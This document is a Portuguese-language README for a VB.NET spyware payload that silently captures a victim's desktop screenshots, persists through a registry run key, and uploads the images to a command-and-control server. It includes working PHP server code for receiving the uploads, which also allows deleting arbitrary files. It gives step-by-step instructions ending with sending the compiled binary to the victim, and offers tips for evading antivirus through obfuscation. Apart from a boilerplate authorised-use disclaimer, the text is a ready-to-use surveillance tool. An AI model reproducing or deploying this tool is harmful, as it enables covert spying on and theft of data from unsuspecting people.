Mr.Peter

Captura de tela silenciosa | Carga útil pós-exploração | VB.NET

Uma carga útil simples para fazer uma captura de tela da área de trabalho da vítima e carregá-la no C&C.

• Persistente (usando chave de execução do registro)
• Funciona em segundo plano
• Menos código, menos bugs e menos detecção;)
• Exclui a captura de tela do disco após carregá-la no C&C
• Servidor C&C em base64
• Faça upload de capturas de tela de forma organizada no C&C
• Não é necessário encaminhamento de porta! funciona com um único arquivo php
• [TODO] Informações da Máquina
• [TODO] Criptografia
• [TODO] Definir intervalo remotamente de C&C

• Clone este repositório.
• Um webhosting que eu recomendo namecheap
• Vá para sua pasta public_html e crie um novo arquivo PHP e coloque o código abaixo nele

 <?php
$del = $_GET["dellog"];
$folder = $_GET["folder"];
mkdir($folder,0777);
$file = $_GET["path"];
if (!empty($_FILES["file"])){
move_uploaded_file($_FILES["file"]["tmp_name"],
      $file . "/" . $_FILES["file"]["name"]);
}
unlink($del);
?>

• Abra o projeto no Visual Studio e edite a variável abaixo no código-fonte

 Dim server As String = BaseDecode1("your server address here in base64 encoded") 

• e edite esta variável abaixo também

 Dim php As String = "yourphpfilename.php?" & "folder="

• Basta compilá-lo e enviá-lo para a vítima, só isso !!

Para evitar a detecção de antivírus

• Alterar o ícone do aplicativo
• Gerar novo GUID
• Muda todas as variáveis
• Ofuscar o código usando Obfuscar
• Alterar as informações da montagem

Se esta ferramenta foi útil para você, fique à vontade para me agradecer comprando um café para mim :)

Esta ferramenta deve ser usada apenas em sistemas autorizados. Qualquer uso não autorizado desta ferramenta sem permissão explícita é ilegal.

LICENÇA PÚBLICA GERAL GNU